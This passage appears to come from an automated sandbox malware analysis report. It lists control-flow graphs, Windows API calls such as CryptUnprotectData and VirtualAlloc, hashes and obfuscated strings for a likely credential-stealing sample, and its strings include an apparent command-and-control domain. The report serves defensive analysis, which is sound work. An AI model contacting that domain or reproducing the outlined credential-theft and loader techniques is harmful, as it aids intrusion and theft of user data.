445260 422->423 424 418f62-418f67 422->424 427 418f94-418f9c 423->427 425 418f70-418f7f 424->425 425->423 425->425 427->359 427->360 427->362 427->363 427->364 427->365 427->366 427->369 427->370 427->376
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2277409733.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2277409733.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_1831.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: PWPQ$bd\,$fnga$oQ
                                                                                                    • API String ID: 0-3706350231
                                                                                                    • Opcode ID: fe0c42c07420c9bbc5d61f49a80fd29d9882301a9105f023342265155b572c4c
                                                                                                    • Instruction ID: e34152e6636813154928bb160b9fd2834c9c91dba41fdab838839377217cf8bd
                                                                                                    • Opcode Fuzzy Hash: fe0c42c07420c9bbc5d61f49a80fd29d9882301a9105f023342265155b572c4c
                                                                                                    • Instruction Fuzzy Hash: 1CC126766083408FD7258F24C8557AB77E6EFC6314F08892EE8998B391EF388841C787

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 428 422370-422384 429 42238a-4223df 428->429 430 42286f-42287b 428->430 431 4223e0-422459 429->431 431->431 432 42245b-4224a3 call 441650 431->432 435 4224b0-4224c4 432->435 435->435 436 4224c6-422508 435->436 437 422510-422524 436->437 437->437 438 422526-422578 437->438 439 422580-422594 438->439 439->439 440 422596-4225d9 call 443b60 439->440 443 4225dc-4225e5 440->443 444 4225e7-4225fc 443->444 445 42264f-422651 443->445 447 422656-422658 444->447 448 4225fe-422603 444->448 445->430 450 422865-42286b 447->450 449 422610-422619 448->449 449->449 451 42261b-42262a 449->451 450->430 452 422630-422639 451->452 452->452 453 42263b-422646 452->453 454 422648-42264d 453->454 455 42265d 453->455 456 42265f-422670 call 408270 454->456 455->456 459 422672-422677 456->459 460 422691-4226a5 456->460 462 422680-42268f 459->462 461 4226b0-4226d3 460->461 461->461 463 4226d5-4226e7 461->463 462->460 462->462 464 422701-422715 463->464 465 4226e9-4226ef 463->465 468 422717-422727 464->468 469 422778-42277a 464->469 466 4226f0-4226ff 465->466 466->464 466->466 468->469 473 422729-422749 468->473 470 422852-422862 call 408280 469->470 470->450 473->469 477 42274b-42275a 473->477 478 422760-422769 477->478 478->478 479 42276b-42276f 478->479 480 422771-422776 479->480 481 42277f 479->481 482 422781-422792 call 408270 480->482 481->482 485 4227b1-4227c2 482->485 486 422794-422799 482->486 488 4227d0-4227e4 485->488 487 4227a0-4227af 486->487 487->485 487->487 488->488 489 4227e6-4227ff 488->489 490 422822-42284f call 4219a0 call 408280 489->490 491 422801-422804 489->491 490->470 492 422810-422820 491->492 492->490 492->492
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2277409733.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2277409733.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_1831.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: -jkhanold~m`$anold~m`$d~m`
                                                                                                    • API String ID: 0-185452761
                                                                                                    • Opcode ID: d49d82f6dee0b69ccdeb9ac9c72559ba4ec1d23df509649ca449329d3e76b77d
                                                                                                    • Instruction ID: c4d8edb6bc4b196318c262ba746bf01715a487006edf2819d48878c0ea44a364
                                                                                                    • Opcode Fuzzy Hash: d49d82f6dee0b69ccdeb9ac9c72559ba4ec1d23df509649ca449329d3e76b77d
                                                                                                    • Instruction Fuzzy Hash: C8D1BBB06083509FD710DF68D892B6BBBE0FF85318F54491DE8958B392E7B8D809CB56

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 562 415d89 563 4182c9 562->563 564 4182cb-4182d1 562->564 563->564 564->563 565 4182d3-4182fb 564->565 566 418302 565->566 567 4182fd-418300 565->567 568 418303-41830f 566->568 567->566 567->568 569 418311-418314 568->569 570 418316 568->570 569->570 571 418317-41832d call 408270 569->571 570->571 574 418423-418463 call 443b60 571->574 575 418333-41833a 571->575 578 418468-418488 CryptUnprotectData 574->578 577 418353-41839c call 41d040 * 2 575->577 583 418340-41834d 577->583 584 41839e-4183b5 call 41d040 577->584 583->574 583->577 584->583 587 4183b7-4183df 584->587 587->583 588 4183e5-4183ff call 41d040 587->588 588->583 591 418405-41841e 588->591 591->583
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2277409733.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2277409733.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_1831.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: dbee84ecd3790633f2c83826065bd30b531f242f0a5518141b0bd449406d4866
                                                                                                    • Instruction ID: fe71d1bcebcc68b075db47888e1e2cba677fa4d5c187ad294acff22be9a80e62
                                                                                                    • Opcode Fuzzy Hash: dbee84ecd3790633f2c83826065bd30b531f242f0a5518141b0bd449406d4866
                                                                                                    • Instruction Fuzzy Hash: 1B51B9B16086428FC714CF58C4917ABF7E2ABD5304F18892EE4EA87342E739DD45CB86
                                                                                                    APIs
                                                                                                    • LdrInitializeThunk.NTDLL(0044523A,00000002,00000018,?,?,00000018,?,?,?), ref: 004420AE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2277409733.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2277409733.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_1831.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                    • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                                                    • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                    • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2277409733.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2277409733.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_1831.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 4c5a90b9fb371d52f131ad3a9995dc80354c686060061162c2bdec51d185e8da
                                                                                                    • Instruction ID: 01036c0abe53894f00a23a0b33865d1644de07ddd8768e0b6d49d0c725de61cd
                                                                                                    • Opcode Fuzzy Hash: 4c5a90b9fb371d52f131ad3a9995dc80354c686060061162c2bdec51d185e8da
                                                                                                    • Instruction Fuzzy Hash: 0F4100BA4583028BD314CF51D89035BFAE3ABC5308F19CA2DE4C95B344DAB9C5098B96
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2277409733.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2277409733.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_1831.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 136ff0709e28839b269720e4fb839b7b46befae130c92130e2f97ddf8959a9d5
                                                                                                    • Instruction ID: d294dc39abdefed7299eeb113bd94dd65164e84cb7974bfe8d228d73c8c27ee3
                                                                                                    • Opcode Fuzzy Hash: 136ff0709e28839b269720e4fb839b7b46befae130c92130e2f97ddf8959a9d5
                                                                                                    • Instruction Fuzzy Hash: 1911D0792593018BD308CF55DC9136BFBE3ABC6348F19C92DE18557355CAB8C106CB5A

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 111 20d003c-20d0047 112 20d004c-20d0263 call 20d0a3f call 20d0e0f call 20d0d90 VirtualAlloc 111->112 113 20d0049 111->113 128 20d028b-20d0292 112->128 129 20d0265-20d0289 call 20d0a69 112->129 113->112 131 20d02a1-20d02b0 128->131 133 20d02ce-20d03c2 VirtualProtect call 20d0cce call 20d0ce7 129->133 131->133 134 20d02b2-20d02cc 131->134 140 20d03d1-20d03e0 133->140 134->131 141 20d0439-20d04b8 VirtualFree 140->141 142 20d03e2-20d0437 call 20d0ce7 140->142 144 20d04be-20d04cd 141->144 145 20d05f4-20d05fe 141->145 142->140 147 20d04d3-20d04dd 144->147 148 20d077f-20d0789 145->148 149 20d0604-20d060d 145->149 147->145 153 20d04e3-20d0505 LoadLibraryA 147->153 151 20d078b-20d07a3 148->151 152 20d07a6-20d07b0 148->152 149->148 154 20d0613-20d0637 149->154 151->152 155 20d086e-20d08be LoadLibraryA 152->155 156 20d07b6-20d07cb 152->156 157 20d0517-20d0520 153->157 158 20d0507-20d0515 153->158 159 20d063e-20d0648 154->159 163 20d08c7-20d08f9 155->163 160 20d07d2-20d07d5 156->160 161 20d0526-20d0547 157->161 158->161 159->148 162 20d064e-20d065a 159->162 164 20d0824-20d0833 160->164 165 20d07d7-20d07e0 160->165 166 20d054d-20d0550 161->166 162->148 167 20d0660-20d066a 162->167 169 20d08fb-20d0901 163->169 170 20d0902-20d091d 163->170 168 20d0839-20d083c 164->168 171 20d07e4-20d0822 165->171 172 20d07e2 165->172 173 20d0556-20d056b 166->173 174 20d05e0-20d05ef 166->174 175 20d067a-20d0689 167->175 168->155 176 20d083e-20d0847 168->176 169->170 171->160 172->164 179 20d056d 173->179 180 20d056f-20d057a 173->180 174->147 177 20d068f-20d06b2 175->177 178 20d0750-20d077a 175->178 183 20d0849 176->183 184 20d084b-20d086c 176->184 185 20d06ef-20d06fc 177->185 186 20d06b4-20d06ed 177->186 178->159 179->174 181 20d057c-20d0599 180->181 182 20d059b-20d05bb 180->182 194 20d05bd-20d05db 181->194 182->194 183->155 184->168 188 20d06fe-20d0748 185->188 189 20d074b 185->189 186->185 188->189 189->175 194->166
                                                                                                    APIs
                                                                                                    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 020D024D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2277988619.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020D0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_20d0000_1831.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AllocVirtual
                                                                                                    • String ID: cess$kernel32.dll
                                                                                                    • API String ID: 4275171209-1230238691
                                                                                                    • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                    • Instruction ID: dca78506bd68bbaebe83f703c92878055dae886c6e97be66cdc185833bc2fdca
                                                                                                    • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                    • Instruction Fuzzy Hash: 62525A74A01229DFDB64CF58C984BACBBB1BF09314F1480D9E94DAB351DB30AA95DF14

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 497 20a07a6-20a07bf 498 20a07c1-20a07c3 497->498 499 20a07ca-20a07d6 CreateToolhelp32Snapshot 498->499 500 20a07c5 498->500 501 20a07d8-20a07de 499->501 502 20a07e6-20a07f3 Module32First 499->502 500->499 501->502 508 20a07e0-20a07e4 501->508 503 20a07fc-20a0804 502->503 504 20a07f5-20a07f6 call 20a0465 502->504 509 20a07fb 504->509 508->498 508->502 509->503
                                                                                                    APIs
                                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 020A07CE
                                                                                                    • Module32First.KERNEL32(00000000,00000224), ref: 020A07EE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2277951970.00000000020A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020A0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_20a0000_1831.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                    • String ID:
                                                                                                    • API String ID: 3833638111-0
                                                                                                    • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                    • Instruction ID: 8d659c7b413419b2f988576143d97f6a89123ddc3dc83f07f48dd86c176834ea
                                                                                                    • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                    • Instruction Fuzzy Hash: 20F0F6319003196FE7203BF5D89CB6F76E9BF49625F500128E643910C0DB70E8059E60

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • GetForegroundWindow.USER32 ref: 004423C5
                                                                                                    • GetForegroundWindow.USER32 ref: 004423E0
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2277409733.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2277409733.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_1831.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ForegroundWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 2020703349-0
                                                                                                    • Opcode ID: ea1af17a4c87661e7e22aa3b412247517447923eaeb0832990aa116f906f78b1
                                                                                                    • Instruction ID: 3f5cde6939bccaa2b971e6e0c262a6c41a2af89a1d69f81b939c4d59ebd80ce7
                                                                                                    • Opcode Fuzzy Hash: ea1af17a4c87661e7e22aa3b412247517447923eaeb0832990aa116f906f78b1
                                                                                                    • Instruction Fuzzy Hash: D3D0A7BDD114104BB2559720BC0E45F36119B9B20A304443CE4070121BEA35118E868E

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 515 20d0e0f-20d0e24 SetErrorMode * 2 516 20d0e2b-20d0e2c 515->516 517 20d0e26 515->517 517->516
                                                                                                    APIs
                                                                                                    • SetErrorMode.KERNELBASE(00000400,?,?,020D0223,?,?), ref: 020D0E19
                                                                                                    • SetErrorMode.KERNELBASE(00000000,?,?,020D0223,?,?), ref: 020D0E1E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2277988619.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020D0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_20d0000_1831.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ErrorMode
                                                                                                    • String ID:
                                                                                                    • API String ID: 2340568224-0
                                                                                                    • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                    • Instruction ID: 6694f36606793361b509c331fc2bc32e2ccd64f7af50ad39e78bfb29505a1a99
                                                                                                    • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                    • Instruction Fuzzy Hash: 87D0123114522877D7412AA4DC09BCD7B5CDF05B66F008011FB0DD9080C770954046E9
                                                                                                    APIs
                                                                                                    • RtlReAllocateHeap.NTDLL(?,00000000,?,00000000,?,?,0040BC80,00000000,00000000), ref: 00442052
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2277409733.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2277409733.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_1831.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AllocateHeap
                                                                                                    • String ID:
                                                                                                    • API String ID: 1279760036-0
                                                                                                    • Opcode ID: ea8428d80ce760913c6091ce044fd24d24df86904107ae5a33981043699a0a50
                                                                                                    • Instruction ID: ce4dc6f8cea40f70218e043c946db7baefed7d7f927e290f9bf4e18e7a102a01
                                                                                                    • Opcode Fuzzy Hash: ea8428d80ce760913c6091ce044fd24d24df86904107ae5a33981043699a0a50
                                                                                                    • Instruction Fuzzy Hash: 95E02B72514210ABF2101F387C05B1736749FC2715F054436F601A3111D739E811C19E
                                                                                                    APIs
                                                                                                    • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040D413
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2277409733.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2277409733.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_1831.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Initialize
                                                                                                    • String ID:
                                                                                                    • API String ID: 2538663250-0
                                                                                                    • Opcode ID: b103da860b07b6caeef7231849386c8b9813f2fcc2fc8537c1924e67a92246bd
                                                                                                    • Instruction ID: 5b8c1c1c38bc235c753b9088e917c06d101502a7d4806eff28edba5b46e46085
                                                                                                    • Opcode Fuzzy Hash: b103da860b07b6caeef7231849386c8b9813f2fcc2fc8537c1924e67a92246bd
                                                                                                    • Instruction Fuzzy Hash: 32D05E7565014477D2146B18EC47F563658970375AF000229F663C65D1D910A915E569
                                                                                                    APIs
                                                                                                    • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040D445
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2277409733.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2277409733.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_1831.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitializeSecurity
                                                                                                    • String ID:
                                                                                                    • API String ID: 640775948-0
                                                                                                    • Opcode ID: 08574d9084c9b59a9be89533cd06f00eba31ac9089c6781083e346e8ebf9aaa5
                                                                                                    • Instruction ID: f87055a7ed73e73a39e7b0bf2bc1a884afc0d8708234b3b1202e7b1dbc502a37
                                                                                                    • Opcode Fuzzy Hash: 08574d9084c9b59a9be89533cd06f00eba31ac9089c6781083e346e8ebf9aaa5
                                                                                                    • Instruction Fuzzy Hash: 52D0C9787D8305B7F6685B18EC17F1632505306F61F340229B366FF6D0C9D07901961C
                                                                                                    APIs
                                                                                                    • RtlFreeHeap.NTDLL(?,00000000), ref: 004404FD
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2277409733.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2277409733.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_1831.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FreeHeap
                                                                                                    • String ID:
                                                                                                    • API String ID: 3298025750-0
                                                                                                    • Opcode ID: ffaa9ae7a0f019c742f1804f8799764577334675712f88277fcdd572fe457cd5
                                                                                                    • Instruction ID: e6622cb3e0fd9e941ff1a23b217b6006838c210e8ccdd082eec4ddb73310e109
                                                                                                    • Opcode Fuzzy Hash: ffaa9ae7a0f019c742f1804f8799764577334675712f88277fcdd572fe457cd5
                                                                                                    • Instruction Fuzzy Hash: 4AC08C31504922EBC7102F28BC16BC63A14EF02762F0748B1F000A90B5C728EC91C9D8
                                                                                                    APIs
                                                                                                    • RtlAllocateHeap.NTDLL(?,00000000,?,00000001,00408C27,FDFCE302), ref: 004404C0
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2277409733.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2277409733.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_1831.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AllocateHeap
                                                                                                    • String ID:
                                                                                                    • API String ID: 1279760036-0
                                                                                                    • Opcode ID: 1b7010b4c8090af6c82bcce16cf64795d3be7dfa4a7c6d6e8218ea40ee4cb554
                                                                                                    • Instruction ID: a3e7d273c8645b615fb13e0d68042f64d6ea605513032f2b713a79b74872f641
                                                                                                    • Opcode Fuzzy Hash: 1b7010b4c8090af6c82bcce16cf64795d3be7dfa4a7c6d6e8218ea40ee4cb554
                                                                                                    • Instruction Fuzzy Hash: CFC04871045220ABDA502B25EC09BCA3A68AF46662F0280A6B044A70B2C760AC82CA98
                                                                                                    APIs
                                                                                                    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 020A04B6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2277951970.00000000020A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020A0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_20a0000_1831.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AllocVirtual
                                                                                                    • String ID:
                                                                                                    • API String ID: 4275171209-0
                                                                                                    • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                    • Instruction ID: bdc41ccda184dcb8944b69ff46fb398ea0e0b7b47c1004dea63479c10d35ad1d
                                                                                                    • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                    • Instruction Fuzzy Hash: 3D113C79A40208EFDB01DF98C985E98BBF5AF08750F058094F9489B361D371EA50EF80
                                                                                                    APIs
                                                                                                    • CoCreateInstance.COMBASE(80838290,00000000,00000001,?,00000000), ref: 0210D7D9
                                                                                                    • SysAllocString.OLEAUT32 ref: 0210D86F
                                                                                                    • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0210D8AD
                                                                                                    • SysAllocString.OLEAUT32 ref: 0210D90F
                                                                                                    • SysAllocString.OLEAUT32 ref: 0210D9CC
                                                                                                    • VariantInit.OLEAUT32(?), ref: 0210DA3D
                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0210DDC4
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2277988619.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020D0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_20d0000_1831.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: String$Alloc$BlanketCreateFreeInitInstanceProxyVariant
                                                                                                    • String ID: fF$CfF$[B$[J$tu$yv${pqv
                                                                                                    • API String ID: 2895375541-1972840126
                                                                                                    • Opcode ID: bdaff328534dd5683dbd10ee3d6b6dc991919c11ec2b92dd5ed535f15564d12e
                                                                                                    • Instruction ID: 2eae990534a00fbe987fed5415118b083f4821f285b2c52f9919823feb8cd508
                                                                                                    • Opcode Fuzzy Hash: bdaff328534dd5683dbd10ee3d6b6dc991919c11ec2b92dd5ed535f15564d12e
                                                                                                    • Instruction Fuzzy Hash: 976213726583508FE324CF68D89176BBBE1EF85314F15892CE5D58B3D0D7B99809CB82
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2277409733.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2277409733.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_1831.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 6$6y$EnA$YjM$YjM$fjM$fjM$pSlM$yx$y~${
                                                                                                    • API String ID: 0-2342033412
                                                                                                    • Opcode ID: bcc76d1abf98286d77b35e6a0b09e71a8baff3536dadb212a893043a5b643fc1
                                                                                                    • Instruction ID: a2001c8a8adb2b8dbf3dd01cda6d968c98786edfc2a21b29c8f54ffb17cc71b7
                                                                                                    • Opcode Fuzzy Hash: bcc76d1abf98286d77b35e6a0b09e71a8baff3536dadb212a893043a5b643fc1
                                                                                                    • Instruction Fuzzy Hash: 9762E3741083418FE724CF25C891BAB77E1FF86314F15496DE0D69B2A2D738D84ACB9A
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2277409733.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2277409733.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_1831.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Uninitialize
                                                                                                    • String ID: RYZ[$UGC9$Zb$c[i!$cloudewahsj.shop$yD
                                                                                                    • API String ID: 3861434553-1392773931
                                                                                                    • Opcode ID: 9bb15100d4bb6a15a77dc5872525b3ecedab199ceaceba36afab7cc08321f92a
                                                                                                    • Instruction ID: 966cdb19ca8ac249a37a340b6d4c56d028db331cb6ce3dd003334f0be9ec8841
                                                                                                    • Opcode Fuzzy Hash: 9bb15100d4bb6a15a77dc5872525b3ecedab199ceaceba36afab7cc08321f92a
                                                                                                    • Instruction Fuzzy Hash: C3C1FF7150C3D08BDB348F2598687ABBBE1AFD2304F084D6DD8D95B286D678450A8B96
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2277988619.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020D0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_20d0000_1831.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Uninitialize
                                                                                                    • String ID: RYZ[$UGC9$Zb$c[i!$cloudewahsj.shop$yD
                                                                                                    • API String ID: 3861434553-1392773931
                                                                                                    • Opcode ID: 9bb15100d4bb6a15a77dc5872525b3ecedab199ceaceba36afab7cc08321f92a
                                                                                                    • Instruction ID: 50cb193d9fc6d2e9655c6f7c25522fe10b7489cf8eb4e7a7e9398a11a51f23a3
                                                                                                    • Opcode Fuzzy Hash: 9bb15100d4bb6a15a77dc5872525b3ecedab199ceaceba36afab7cc08321f92a
                                                                                                    • Instruction Fuzzy Hash: 55C1207150D3C08BDB35CF24C8687ABBBE1AFD2304F08496CD4D95B286D778450ACBA6
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2277409733.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2277409733.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_1831.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: )Ku$DM_e$S;G%$SV$UGEA$c[G$ox}k$x[G
                                                                                                    • API String ID: 0-3323421312
                                                                                                    • Opcode ID: 955f6e51a34149f4c10f413aa8795b1a1dd05340e96898ae9af78c9a06cf57c5
                                                                                                    • Instruction ID: 7fd46061e40033794bbc6c3ce90a1e611a10dbdcf815d020572bc93dee4dedaf
                                                                                                    • Opcode Fuzzy Hash: 955f6e51a34149f4c10f413aa8795b1a1dd05340e96898ae9af78c9a06cf57c5
                                                                                                    • Instruction Fuzzy Hash: 55D1F57150C3408BD724CF29845476BFBE2EFD1708F18896DE4D56B385D77A890A8B8B
                                                                                                    Strings
                                                                                                    Memory Dump Source
